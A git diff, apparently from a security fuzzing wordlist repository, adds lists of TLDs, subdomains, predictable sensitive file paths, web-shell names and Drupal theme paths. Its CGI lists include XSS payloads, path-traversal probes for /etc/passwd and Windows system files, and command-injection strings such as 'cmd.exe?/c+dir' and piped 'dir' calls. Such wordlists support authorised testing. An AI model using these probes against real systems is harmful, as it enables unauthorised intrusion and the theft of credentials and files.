cv
cw
cx
cy
cz
dd
de
dj
dk
dm
do
dz
ec
ee
eg
eh
er
es
et
eu
fi
fj
fk
fm
fo
fr
ga
gb
gd
ge
gf
gg
gh
gi
gl
gm
gn
gp
gq
gr
gs
gt
gu
gw
gy
hk
hm
hn
hr
ht
hu
id
ie
il
im
in
io
iq
ir
is
it
je
jm
jo
jp
ke
kg
kh
ki
km
kn
kp
kr
kw
ky
kz
la
lb
lc
li
lk
lr
ls
lt
lu
lv
ly
ma
mc
md
me
mf
mg
mh
mk
ml
mm
mn
mo
mp
mq
mr
ms
mt
mu
mv
mw
mx
my
mz
na
nc
ne
nf
ng
ni
nl
no
np
nr
nu
nz
om
pa
pe
pf
pg
ph
pk
pl
pm
pn
pr
ps
pt
pw
py
qa
re
ro
rs
ru
rw
sa
sb
sc
sd
se
sg
sh
si
sj
sk
sl
sm
sn
so
sr
ss
st
su
sv
sx
sy
sz
tc
td
tf
tg
th
tj
tk
tl
tm
tn
to
tp
tr
tt
tv
tw
tz
ua
ug
uk
um
us
uy
uz
va
vc
ve
vg
vi
vn
vu
wf
ws
ye
yt
yu
za
zm
zw

50000
discovery/dns/alexaTop1mAXFRcommonSubdomains.txt Normal file
View file

File diff suppressed because it is too large Load diff

989
discovery/dns/dnsmapCommonSubdomains.txt Normal file
View file

@ -0,0 +1,989 @@
a
aa
ab
ac
access
accounting
accounts
ad
admin
administrator
ae
af
ag
ah
ai
aix
aj
ak
al
am
an
ao
ap
apollo
aq
ar
archivos
as
at
au
aula
aulas
av
aw
ax
ay
ayuda
az
b
ba
backup
backups
bart
bb
bc
bd
be
beta
bf
bg
bh
bi
biblioteca
billing
bj
bk
bl
blackboard
blog
blogs
bm
bn
bo
bp
bq
br
bs
bsd
bt
bu
bv
bw
bx
by
bz
c
ca
carro
cart
cas
catalog
catalogo
catalogue
cb
cc
cd
ce
cf
cg
ch
chat
chimera
chronos
ci
citrix
cj
ck
cl
classroom
clientes
clients
cm
cn
co
connect
controller
correoweb
cp
cpanel
cq
cr
cs
csg
ct
cu
customers
cv
cw
cx
cy
cz
d
da
data
db
dbs
dc
dd
de
demo
demon
demostration
descargas
developers
development
df
dg
dh
di
diana
directory
dj
dk
dl
dm
dmz
dn
do
domain
domaincontroller
domain-controller
download
downloads
dp
dq
dr
ds
dt
du
dv
dw
dx
dy
dz
e
ea
eaccess
eb
ec
ed
ee
ef
eg
eh
ei
ej
ejemplo
ejemplos
ek
el
em
email
en
enrutador
eo
ep
eq
er
es
et
eu
ev
eventos
events
ew
ex
example
examples
exchange
extranet
ey
ez
f
fa
fb
fc
fd
fe
ff
fg
fh
fi
files
finance
firewall
fj
fk
fl
fm
fn
fo
foro
foros
forum
forums
fp
fq
fr
freebsd
fs
ft
ftp
ftpd
fu
fv
fw
fx
fy
fz
g
ga
galeria
gallery
gateway
gb
gc
gd
ge
gf
gg
gh
gi
gilford
gj
gk
gl
gm
gn
go
gp
gq
gr
groups
groupwise
gs
gt
gu
guest
guia
guide
gv
gw
gx
gy
gz
h
ha
hb
hc
hd
he
help
helpdesk
hera
heracles
hercules
hf
hg
hh
hi
hj
hk
hl
hm
hn
ho
home
homer
hotspot
hp
hq
hr
hs
ht
hu
hv
hw
hx
hy
hypernova
hz
i
ia
ib
ic
id
ie
if
ig
ih
ii
ij
ik
il
im
images
imail
imap
imap3
imap3d
imapd
imaps
imgs
imogen
in
inmuebles
internal
interno
intranet
io
ip
ip6
ipsec
ipv6
iq
ir
irc
ircd
is
isa
it
iu
iv
iw
ix
iy
iz
j
ja
jabber
jb
jc
jd
je
jf
jg
jh
ji
jj
jk
jl
jm
jn
jo
jp
jq
jr
js
jt
ju
jupiter
jv
jw
jx
jy
jz
k
ka
kb
kc
kd
ke
kf
kg
kh
ki
kj
kk
kl
km
kn
ko
kp
kq
kr
ks
kt
ku
kv
kw
kx
ky
kz
l
la
lab
laboratories
laboratorio
laboratory
labs
lb
lc
ld
le
lf
lg
lh
li
library
linux
lisa
lj
lk
ll
lm
ln
lo
localhost
log
login
logon
logs
lp
lq
lr
ls
lt
lu
lv
lw
lx
ly
lz
m
ma
mail
mailgate
manager
marketing
mb
mc
md
me
media
member
members
mercury
meta
meta01
meta02
meta03
meta1
meta2
meta3
mf
mg
mh
mi
miembros
minerva
mj
mk
ml
mm
mn
mo
mob
mobile
moodle
movil
mp
mq
mr
ms
mssql
mt
mu
mv
mw
mx
mx0
mx01
mx02
mx03
mx1
mx2
mx3
my
mysql
mz
n
na
nb
nc
nd
ne
nelson
neon
net
netmail
news
nf
ng
nh
ni
nj
nk
nl
nm
nn
no
novell
np
nq
nr
ns
ns0
ns01
ns02
ns03
ns1
ns2
ns3
nt
ntp
nu
nv
nw
nx
ny
nz
o
oa
ob
oc
od
oe
of
og
oh
oi
oj
ok
ol
om
on
online
oo
op
oq
or
ora
oracle
os
osx
ot
ou
ov
ow
owa
ox
oy
oz
p
pa
partners
pb
pc
pcanywhere
pd
pe
pegasus
pendrell
personal
pf
pg
ph
photo
photos
pi
pj
pk
pl
pm
pn
po
pop
pop3
portal
postgresql
postman
postmaster
pp
ppp
pq
pr
preprod
pre-prod
private
prod
proxy
prueba
pruebas
ps
pt
pu
pub
public
pv
pw
px
py
pz
q
qa
qb
qc
qd
qe
qf
qg
qh
qi
qj
qk
ql
qm
qn
qo
qp
qq
qr
qs
qt
qu
qv
qw
qx
qy
qz
r
ra
ras
rb
rc
rd
re
remote
reports
research
restricted
rf
rg
rh
ri
rj
rk
rl
rm
rn
ro
robinhood
router
rp
rq
rr
rs
rt
rtr
ru
rv
rw
rx
ry
rz
s
sa
sales
sample
samples
sandbox
sb
sc
sd
se
search
secure
seguro
server
services
servicios
servidor
sf
sg
sh
sharepoint
shop
shopping
si
sj
sk
sl
sm
sms
smtp
sn
so
socios
solaris
soporte
sp
sq
sql
squirrel
squirrelmail
sr
ss
ssh
st
staff
staging
stats
su
sun
support
sv
sw
sx
sy
sz
t
ta
tb
tc
td
te
test
tf
tftp
tg
th
ti
tienda
tj
tk
tl
tm
tn
to
tp
tq
tr
ts
tt
tu
tunnel
tv
tw
tx
ty
tz
u
ua
uat
ub
uc
ud
ue
uf
ug
uh
ui
uj
uk
ul
um
un
unix
uo
up
upload
uploads
uq
ur
us
ut
uu
uv
uw
ux
uy
uz
v
va
vb
vc
vd
ve
ventas
vf
vg
vh
vi
virtual
vista
vj
vk
vl
vm
vn
vnc
vo
vp
vpn
vpn1
vpn2
vpn3
vq
vr
vs
vt
vu
vv
vw
vx
vy
vz
w
wa
wap
wb
wc
wd
we
web
web0
web01
web02
web03
web1
web2
web3
webadmin
webct
weblog
webmail
webmaster
webmin
wf
wg
wh
wi
win
windows
wj
wk
wl
wm
wn
wo
wp
wq
wr
ws
wt
wu
wv
ww
ww0
ww01
ww02
ww03
ww1
ww2
ww3
www
www0
www01
www02
www03
www1
www2
www3
wx
wy
wz
x
xa
xanthus
xb
xc
xd
xe
xf
xg
xh
xi
xj
xk
xl
xm
xn
xo
xp
xq
xr
xs
xt
xu
xv
xw
xx
xy
xz
y
ya
yb
yc
yd
ye
yf
yg
yh
yi
yj
yk
yl
ym
yn
yo
yp
yq
yr
ys
yt
yu
yv
yw
yx
yy
yz
z
za
zb
zc
zd
ze
zeus
zf
zg
zh
zi
zj
zk
zl
zm
zn
zo
zp
zq
zr
zs
zt
zu
zv
zw
zx
zy
zz

784
discovery/dns/gTLD.txt Normal file
View file

@ -0,0 +1,784 @@
한국
테스트
ABB
ABBOTT
ABOGADO
academy
ACCENTURE
ACCOUNTANT
accountants
ACCOUNTANTS
ACTIVE
actor
ADS
ADULT
aero
AFL
agency
AIG
airforce
AIRFORCE
ALLFINANZ
ALSACE
AMSTERDAM
ANDROID
APARTMENTS
AQUARELLE
archi
ARMY
arpa
asia
associates
ASSOCIATES
ATTORNEY
AUCTION
audio
AUDIO
AUTO
AUTOS
axa
BAND
BANK
bar
BARCLAYCARD
BARCLAYS
bargains
BAUHAUS
bayern
BAYERN
BBC
BBVA
beer
BEER
berlin
best
BIBLE
bid
bike
BINGO
BIO
biz
black
blackfriday
BLACKFRIDAY
BLOOMBERG
blue
BMW
BNPPARIBAS
BOATS
BOND
BOO
boutique
BRIDGESTONE
BROKER
BROTHER
BRUSSELS
BUDAPEST
build
builders
BUSINESS
buzz
BZH
cab
CAFE
CAL
camera
camp
CANCERRESEARCH
CANON
CAPETOWN
capital
CAPITAL
CARAVAN
cards
care
CARE
career
CAREER
careers
CARS
CARTIER
CASA
cash
CASH
CASINO
cat
catering
CBN
center
ceo
CERN
CFA
CFD
CHANNEL
CHAT
cheap
CHLOE
christmas
CHROME
church
CHURCH
CISCO
citic
CITIC
CITY
claims
CLAIMS
cleaning
CLICK
clinic
CLINIC
clothing
club
COACH
codes
coffee
college
COLLEGE
cologne
com
community
company
computer
construction
CONSULTING
contractors
cooking
cool
coop
CORSICA
country
COUPONS
COURSES
credit
CREDIT
creditcard
CREDITCARD
CRICKET
CRS
cruises
CUISINELLA
CYMRU
CYOU
DABUR
DAD
dance
DATE
dating
DATSUN
DAY
DCLK
DEALS
DEGREE
DELIVERY
democrat
dental
DENTAL
DENTIST
desi
DESI
DESIGN
DEV
diamonds
DIET
digital
DIGITAL
DIRECT
directory
discount
DISCOUNT
DOCS
DOG
DOHA
domains
DOOSAN
DOWNLOAD
DURBAN
DVAG
EARTH
EAT
edu
education
email
EMERCK
ENERGY
ENGINEER
engineering
ENGINEERING
enterprises
EPSON
equipment
ERNI
ESQ
estate
EUROVISION
eus
EUS
events
EVERBANK
exchange
EXCHANGE
expert
exposed
EXPRESS
fail
FAIL
FAITH
FAN
FANS
farm
FASHION
feedback
FEEDBACK
FILM
finance
FINANCE
financial
FINANCIAL
FIRMDALE
fish
fishing
FIT
fitness
FITNESS
flights
florist
FLOWERS
FLSMIDTH
FLY
foo
FOO
FOOTBALL
FOREX
FORSALE
foundation
FRL
frogans
FROGANS
fund
FUND
furniture
FURNITURE
futbol
FYI
gal
GAL
gallery
GARDEN
GBIZ
GDN
GENT
GGEE
gift
GIFTS
GIVES
glass
GLE
GLOBAL
globo
GLOBO
GMAIL
gmo
GMO
GMX
GOLD
GOLDPOINT
GOLF
GOO
GOOG
GOOGLE
gop
GOP
gov
graphics
gratis
GRATIS
GREEN
gripe
GRIPE
GUGE
guide
GUIDE
guitars
guru
HAMBURG
HANGOUT
haus
HEALTHCARE
HELP
HERE
HERMES
hiphop
HIPHOP
HITACHI
HIV
HOCKEY
holdings
holiday
HOMEDEPOT
HOMES
HONDA
horse
HOST
HOSTING
house
HOW
IBM
ICBC
ICU
IFM
IMMO
immobilien
industries
INFINITI
info
ING
institute
insure
INSURE
int
international
investments
INVESTMENTS
IRISH
IWC
JAVA
JCB
jetzt
JEWELRY
JLL
jobs
JOBURG
juegos
JUEGOS
kaufen
KDDI
kim
kitchen
kiwi
koeln
KOMATSU
KRD
kred
KYOTO
LACAIXA
land
LAT
LATROBE
LAWYER
LDS
lease
LEASE
LECLERC
LEGAL
LGBT
LIAISON
LIDL
life
LIFE
lighting
limited
LIMITED
limo
link
LOAN
loans
LOANS
LOL
london
LOTTE
LOTTO
LOVE
LTDA
LUPIN
luxe
LUXE
luxury
MADRID
MAIF
management
mango
MARKET
marketing
MARKETS
MARRIOTT
MBA
media
MEDIA
meet
MELBOURNE
MEME
MEMORIAL
MEN
menu
miami
mil
MINI
MMA
mobi
moda
moe
monash
MONEY
MORMON
MORTGAGE
moscow
MOSCOW
MOTORCYCLES
MOV
MOVIE
MTN
MTPC
museum
NADEX
nagoya
name
NAVY
NEC
net
NETWORK
neustar
NEW
NEWS
NEXUS
NGO
NHK
NICO
ninja
NISSAN
NRA
NRW
NTT
nyc
okinawa
ONE
ONG
onl
ONLINE
OOO
ORACLE
org
ORGANIC
OSAKA
OTSUKA
OVH
PAGE
PANERAI
paris
PARIS
partners
parts
PARTY
PHARMACY
PHILIPS
photo
photography
photos
PHYSIO
PIAGET
pics
PICTET
pictures
PICTURES
pink
PIZZA
PLACE
plumbing
PLUS
POHL
POKER
PORN
post
PRAXI
PRESS
pro
PROD
productions
PROF
properties
PROPERTY
pub
qpon
quebec
QUEBEC
RACING
REALTOR
recipes
red
REDSTONE
REHAB
REISE
reisen
REISEN
REIT
ren
RENT
rentals
repair
report
REPUBLICAN
rest
REST
RESTAURANT
REVIEW
reviews
rich
RIO
RIP
rocks
ROCKS
rodeo
RSVP
ruhr
RUN
ryukyu
RYUKYU
saarland
SAARLAND
SALE
SAMSUNG
SANDVIK
SANDVIKCOROMANT
SAP
SARL
SAXO
SCA
SCB
SCHMIDT
SCHOLARSHIPS
SCHOOL
schule
SCHULE
SCHWARZ
SCIENCE
SCOT
SEAT
SENER
services
SERVICES
SEW
SEX
sexy
shiksha
shoes
SHOW
SHRIRAM
singles
SITE
SKI
SKY
SOCCER
social
SOFTWARE
sohu
solar
solutions
SONY
soy
SOY
SPACE
SPIEGEL
SPREADBETTING
STUDY
STYLE
SUCKS
supplies
supply
support
SURF
surgery
SURGERY
SUZUKI
SWISS
SYDNEY
systems
TAIPEI
TATAR
tattoo
tax
TAX
TAXI
TEAM
TECH
technology
tel
TEMASEK
TENNIS
THD
THEATER
TICKETS
tienda
tips
TIRES
TIROL
today
tokyo
tools
TOP
TORAY
TOSHIBA
TOURS
town
TOWN
toys
TOYS
trade
TRADING
training
travel
TRUST
TUI
university
UNIVERSITY
uno
UOL
vacations
vegas
ventures
vermögensberater
vermögensberatung
VERSICHERUNG
VET
viajes
VIDEO
villas
vision
VLAANDEREN
vodka
vote
voting
voto
voyage
WALES
WALTER
wang
watch
webcam
WEBSITE
wed
WEDDING
WEIR
WHOSWHO
wien
wiki
WILLIAMHILL
WIN
WME
WORK
works
WORLD
wtc
WTC
wtf
WTF
XBOX
XEROX
XIN
xn--30rr7y
xn--45q11c
xn--9et52u
xn--b4w605ferd
xn--czrs0t
xn--estv75g
xn--fjq720a
xn--flw351e
xn--hxt814e
xn--imr513n
xn--kcrx77d1x4a
xn--mgbpl2fh
xn--mxtq1m
xn--nyqy26a
xn--qcka1pmc
xn--vuq861b
xn--y9a3aq
xxx
xyz
YACHTS
YANDEX
YODOBASHI
YOGA
yokohama
YOKOHAMA
YOUTUBE
ZIP
zone
ZUERICH
إختبار
ایران
آزمایشی
الاردن
الجزائر
السعودية
المغرب
امارات
بھارت
بازار
پاکستان
تونس
سودان
سورية
شبكة
عمان
فلسطين
قطر
مصر
مليسيا
موقع
טעסט
δοκιμή
дети
испытание
қаз
мкд
мон
москва
онлайн
орг
рус
рф
сайт
срб
укр
გე
परीक्षा
भारत
संगठन
ભારત
భారత్
ਭਾਰਤ
இந்தியா
இலங்கை
சிங்கப்பூர்
பரிட்சை
বাংলা
ভারত
ලංකා
世界
中信
中国
中國
中文网
企业
佛山
公司
公益
台湾
台灣
商城
商标
在线
广东
我爱你
手机
政务
新加坡
机构
测试
測試
游戏
移动
组织机构
网址
网络
集团
香港

2346
discovery/predictable-filepaths/KitchensinkDirectories.txt Normal file
View file

File diff suppressed because it is too large Load diff

24
discovery/predictable-filepaths/Randomfiles.txt Normal file
View file

@ -0,0 +1,24 @@
/accounts.txt
/culeadora.txt
/data.txt
/database.txt
/grabbed.html
/info.txt
/l0gs.txt
/log.txt
/logins.txt
/logs.txt
/members.txt
/pass.txt
/passes.txt
/password.html
/password.txt
/passwords.html
/passwords.txt
/pazz.txt
/pazzezs.txt
/pw.txt
/pws.txt
/technico.txt
/usernames.txt
/users.txt

51
discovery/predictable-filepaths/UnixDotfiles.txt Normal file
View file

@ -0,0 +1,51 @@
/.DS_Store
/.FBCIndex
/.access
/.addressbook
/.bash_history
/.bashrc
/.cobalt
/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
/.cobalt/sysManage/../admin/.htaccess
/.fhp
/.forward
/.history
/.htaccess
/.htaccess.old
/.htaccess.save
/.htaccess~
/.htpasswd
/.lynx_cookies
/.mysql_history
/.nsconfig
/.nsf/../winnt/win.ini
/.passwd
/.perf
/.pinerc
/.plan
/.proclog
/.procmailrc
/.profile
/.psql_history
/.rhosts
/.sh_history
/.ssh
/.ssh/authorized_keys
/.ssh/known_hosts
/.www_acl
/.wwwacl
/.access
/.cobalt
/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
/.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
/.fhp
/.htaccess
/.htaccess.old
/.htaccess.save
/.htaccess~
/.htpasswd
/.nsconfig
/.passwd
/.www_acl
/.wwwacl

29
discovery/predictable-filepaths/backdoors/ASP_CommonBackdoors.txt Normal file
View file

@ -0,0 +1,29 @@
3fexe.asp
ASpy.asp
EFSO.asp
RemExp.asp
aspxSH.asp
aspxshell.aspx
aspydrv.asp
cmd.asp
cmd.aspx
cmdexec.aspx
elmaliseker.asp
filesystembrowser.aspx
fileupload.aspx
ntdaddy.asp
spexec.aspx
sql.aspx
tool.asp
tool.aspx
toolaspshell.asp
up.asp
up.aspx
zehir.asp
zehir.aspx
zehir4.asp
zehir4.aspx
cmd-asp-5.1.asp
cmdasp.asp
cmdasp.aspx
list.asp

1668
discovery/predictable-filepaths/backdoors/bot_control_panels.txt Normal file
View file

File diff suppressed because it is too large Load diff

1167
discovery/predictable-filepaths/backdoors/shells.txt Normal file
View file

File diff suppressed because it is too large Load diff

7
discovery/predictable-filepaths/cgi/CGI_HTTP_POST.txt Normal file
View file

@ -0,0 +1,7 @@
post-query
Config1.htm
My_eGallery/public/displayCategory.php
servlet/custMsg?guestName=<script>alert(document.cookie)(\
servlet/CookieExample?cookiename=<script>alert(document.cookie)(\
lastlines.cgi?process
Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000

6
discovery/predictable-filepaths/cgi/CGI_HTTP_POST_Windows.txt Normal file
View file

@ -0,0 +1,6 @@
_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
admin/db.php
_vti_bin/shtml.dll/_vti_rpc

79
discovery/predictable-filepaths/cgi/CGI_Microsoft.txt Normal file
View file

@ -0,0 +1,79 @@
# on windows, cgi dir is usually /scripts /cgi /cgi-bin, but could be named anything or be the webroot.
/cart32.exe
/get32.exe
/visadmin.exe
/foxweb.exe
/webplus.exe?about
/fpsrvadm.exe
/MsmMask.exe
/cmd.exe?/c+dir
/cmd1.exe?/c+dir
/post32.exe|dir%20c:\\
/cgitest.exe
/hpnst.exe?c=p+i=
/Pbcgi.exe
/testcgi.exe
/webfind.exe?keywords=01234567890123456789
/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C
/test-cgi.exe?<script>alert(document.cookie)</script>
/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
/mkilog.exe
/mkplog.exe
/MsmMask.exe?mask=/junk334
/MsmMask.exe?mask=/junk334
/MsmMask.exe?mask=/junk334
/MsmMask.exe?mask=/junk334
/MsmMask.exe?mask=/junk334
/perl.exe?-v
/perl.exe
/ppdscgi.exe
/c32web.exe/ChangeAdminPassword
/windmail.exe
/dbmlparser.exe
/cgimail.exe
/minimal.exe
/rguest.exe
/visitor.exe
/webbbs.exe
/wguest.exe
//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
/cfgwiz.exe
/Cgitest.exe
/mailform.exe
/post16.exe
/imagemap.exe
/htimage.exe/path/filename?2,2
/htimage.exe
/Webnews.exe
/texis.exe/junk
/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/sensepost.exe?/c+dir
/testcgi.exe
/testcgi.exe?<script>alert(document.cookie)</script>
/ion-p.exe?page=c:\winnt\repair\sam
/../../../../../../../../../../WINNT/system32/ipconfig.exe
/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
/foxweb.dll
/wconsole.dll
/shtml.dll
/scripts/slxweb.dll/getfile?type=Library&file=[invalid
/filename]
/rightfax/fuwww.dll/?
/WINDMAIL.EXE?%20-n%20c:\boot.ini%
/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
/GW5/GWWEB.EXE
/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
/GW5/GWWEB.EXE?HELP=bad-request
/GWWEB.EXE?HELP=bad-request
/echo.bat
/echo.bat?&dir+c:\\
/hello.bat?&dir+c:\\
/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/input2.bat?|dir
/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/test-cgi.bat
/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X

3948
discovery/predictable-filepaths/cgi/CGI_XPlatform.txt Normal file
View file

File diff suppressed because it is too large Load diff

6320
discovery/predictable-filepaths/cms/drupal_plugins.txt Normal file
View file

File diff suppressed because it is too large Load diff

828
discovery/predictable-filepaths/cms/drupal_themes.txt Normal file
View file

@ -0,0 +1,828 @@
themes/001%20Dev%20Skin/
themes/001_dev_skin/
themes/002_dev_skin/
themes/08paros/
themes/1024px/
themes/4_of_July/
themes/Aeon5/
themes/Alina/
themes/Amare/
themes/Amor_Azul/
themes/Andreas1024px/
themes/Autumn/
themes/B7/
themes/BlueSquare/
themes/Bonsai/
themes/Bubbles/
themes/ChaiGaram/
themes/Colorart/
themes/CristalX4Drupal/
themes/DrupalRefresh/
themes/DuoFertility/
themes/Earth_birthday/
themes/Fall/
themes/Grassroutes/
themes/HWCTravel/
themes/Internet_Broadcast/
themes/Internet_Corporation/
themes/July4/
themes/Kyrgyzstan/
themes/MyDrupal-Tidy/
themes/MyDrupal/
themes/MyDrupal_Impact/
themes/MyDrupal_Universal/
themes/MyTree/
themes/NukeNews/
themes/Odeta/
themes/Pixeled/
themes/Plain1/
themes/Pleroma/
themes/Purple_Beauty/
themes/SEOposition/
themes/SHINOBI/
themes/SanQReLl/
themes/SkyLine/
themes/Stasis/
themes/SynFox/
themes/TVframe/
themes/Tendu/
themes/XTemplate_Tableless/
themes/a-cloudy-day/
themes/a3_atlantis/
themes/aBeesParadise/
themes/abac/
themes/abaca/
themes/abarre/
themes/aberdeen/
themes/abessive/
themes/ability/
themes/ablaze/
themes/ablock/
themes/ablogtheme/
themes/aboutpeople/
themes/absolution/
themes/abstract/
themes/absynthe/
themes/abundant/
themes/aclide/
themes/acoldday/
themes/acquia_marina/
themes/acquia_prosper/
themes/acquia_slate/
themes/acrylic/
themes/acta/
themes/active_n_rebuild/
themes/activesigns/
themes/activesite/
themes/ad_agency/
themes/ad_blueprint/
themes/ad_lemon-twist/
themes/ad_novus/
themes/ad_redoable/
themes/ad_the-morning-after/
themes/adaptivetheme/
themes/adaptivetheme_mobile/
themes/adarkproxisstheme/
themes/adc/
themes/addari/
themes/adm_like_xp/
themes/admire-gray/
themes/admire-navy/
themes/admire-orange/
themes/admire_gray/
themes/admire_grunge/
themes/adt_basetheme/
themes/adt_webapplication/
themes/affaires/
themes/agregado/
themes/agua/
themes/airyblue/
themes/alchemist/
themes/alek_2_0/
themes/algaglas/
themes/alina/
themes/almaw/
themes/alpha/
themes/alphorn/
themes/amadou/
themes/amity_island/
themes/analytic/
themes/andreas/
themes/andreas00/
themes/andreas01/
themes/andreas02/
themes/andreas03/
themes/andreas04/
themes/andreas05/
themes/andreas06/
themes/andreas07/
themes/andreas08/
themes/andreas09/
themes/andreas1_tal/
themes/anitakravitz/
themes/antique_modern/
themes/appleweb/
themes/aqua_fish/
themes/aquanaut/
themes/aquasoft/
themes/arclitetheme/
themes/arcmateria/
themes/argeebee/
themes/art4-blue/
themes/art4_blue/
themes/art4_green/
themes/arthemia/
themes/artistsC01/
themes/artschool/
themes/artsy/
themes/async/
themes/at_koda/
themes/at_panels_everywhere/
themes/atck/
themes/atrium_simple/
themes/aurora/
themes/austere/
themes/austin/
themes/autumn_almanac/
themes/awesome/
themes/ax/
themes/ax_clean/
themes/barlow/
themes/barron/
themes/bartik/
themes/base/
themes/base_theme/
themes/baseline/
themes/baselinecss/
themes/basic/
themes/basic_sass/
themes/basketball/
themes/beach/
themes/beat/
themes/beginning/
themes/beginningW2/
themes/berylizer/
themes/bidi/
themes/biz/
themes/black_getsred/
themes/black_mamba/
themes/blackout/
themes/blackpark/
themes/blackprak/
themes/blank/
themes/bleech/
themes/blix/
themes/blogbuzz/
themes/bloggrail/
themes/blogsmith/
themes/blommor01/
themes/blossom/
themes/blue_bars/
themes/blue_zinfandel/
themes/blueberryboat/
themes/bluebreeze/
themes/bluecitron/
themes/bluecurve/
themes/bluefire/
themes/bluefreedom/
themes/bluefun/
themes/bluefx/
themes/blueish/
themes/bluelake/
themes/bluemarine
themes/bluemarine/
themes/bluemarine_ets/
themes/bluemarine_smarty/
themes/bluenile/
themes/blueprint/
themes/bluerobot/
themes/bluerobot2/
themes/bluespan/
themes/bluetrip/
themes/bluezone/
themes/bookstore/
themes/box_grey/
themes/box_grey_rtl/
themes/box_grey_smarty/
themes/brainstorm/
themes/brooklyn/
themes/browntown/
themes/browny/
themes/brushed_steel/
themes/bubbles/
themes/burnt/
themes/burnt_rubber/
themes/busy/
themes/bz_lite/
themes/camaxtli/
themes/camsel/
themes/candy_corn/
themes/candy_corn_rtl/
themes/cdmug/
themes/celadon/
themes/celestial/
themes/celju/
themes/cgiirc/
themes/chameleon
themes/chameleon/
themes/chamfer/
themes/changeme/
themes/channel_nine/
themes/charity/
themes/cherryblossom/
themes/chiquechick/
themes/chitown/
themes/choclatebrown/
themes/chocotheme/
themes/chrono/
themes/chrysalis/
themes/civicspace/
themes/clean-a/
themes/clean/
themes/cleanfolio/
themes/cleanr/
themes/cleanslate/
themes/cleanstate/
themes/clear_dark/
themes/clearblue/
themes/clearlooks/
themes/clementine/
themes/cms-theme/
themes/cod_organizing/
themes/collab/
themes/colorcss/
themes/colorfulness/
themes/colorfulness_theme/
themes/colorpaper/
themes/colourise/
themes/combustion/
themes/compact_lime/
themes/conch/
themes/conference/
themes/connections/
themes/console/
themes/contented7/
themes/contrast/
themes/contributions/
themes/coolwater/
themes/coolweb/
themes/copyblogger/
themes/corolla/
themes/crusti/
themes/crystalxl/
themes/csszg/
themes/cti_flex/
themes/cws/
themes/d4rk/
themes/d7ux/
themes/daleri-structure/
themes/dance/
themes/danger4k/
themes/danland/
themes/dark/
themes/darkblue/
themes/darkelegance/
themes/darkgrail/
themes/darkgreen/
themes/darsch/
themes/decayed/
themes/deco/
themes/delicious_fruit/
themes/deliciously_blue/
themes/delocalized/
themes/democratica/
themes/denver/
themes/dessert/
themes/devavrata_free_bare/
themes/diary/
themes/dichotomy/
themes/dingus/
themes/dotted/
themes/dovetail/
themes/dreamy/
themes/dropshadow/
themes/drucer/
themes/drupal-de-1/
themes/drupalui/
themes/drupazine/
themes/drupera/
themes/drupify/
themes/dusky/
themes/earthen/
themes/earthish/
themes/easybreeze/
themes/ebizon_exotic_red/
themes/ebizon_redfire/
themes/ecobusiness/
themes/eldir/
themes/elegant/
themes/elements_theme/
themes/emspace_2007/
themes/emspace_basic/
themes/energetic/
themes/enlight/
themes/eponymous/
themes/equalizer/
themes/erp_theme/
themes/eve_igb/
themes/evening/
themes/exquisite/
themes/extended/
themes/fadethingee/
themes/fall/
themes/fancy/
themes/fancy_rtl/
themes/fblike/
themes/fern/
themes/fervens/
themes/fields/
themes/fields_2009/
themes/filmforge_theme/
themes/fireflystreamcom/
themes/five/
themes/five_blog/
themes/fiveseasons/
themes/flatforum/
themes/flattering/
themes/flexible/
themes/flexlogin/
themes/fluid/
themes/fluidgrid/
themes/foliage/
themes/forest_floor/
themes/foundation/
themes/fourseasons/
themes/fourseasonsDRUPAL-6/
themes/framework/
themes/freeradicals/
themes/freestyle/
themes/fresh_media/
themes/friendselectric/
themes/friendsforever/
themes/frisbee/
themes/fruity/
themes/fueldeluxe/
themes/fusion/
themes/fusiontheme/
themes/gagarin/
themes/garamond/
themes/gardening/
themes/garland
themes/garland-smarty/
themes/garland/
themes/garlandrtl/
themes/gateway/
themes/gbif/
themes/generic/
themes/genesis/
themes/genesis_LITE/
themes/genesis_coldday/
themes/genesis_darkmatter/
themes/genesis_typo1/
themes/genesis_webify/
themes/genesis_webx/
themes/genesis_zine/
themes/german_newspaper/
themes/gespaa/
themes/global/
themes/glorillacomtheme/
themes/glossyblue/
themes/golden_hour/
themes/goldengray/
themes/goldfish/
themes/gommutheme/
themes/goofy
themes/goofy/
themes/grass/
themes/grassland/
themes/green/
themes/greenNblack/
themes/greenhouse/
themes/greenmarinee/
themes/greenpark/
themes/greens/
themes/greenthing/
themes/greeny_blu/
themes/grid_inspired/
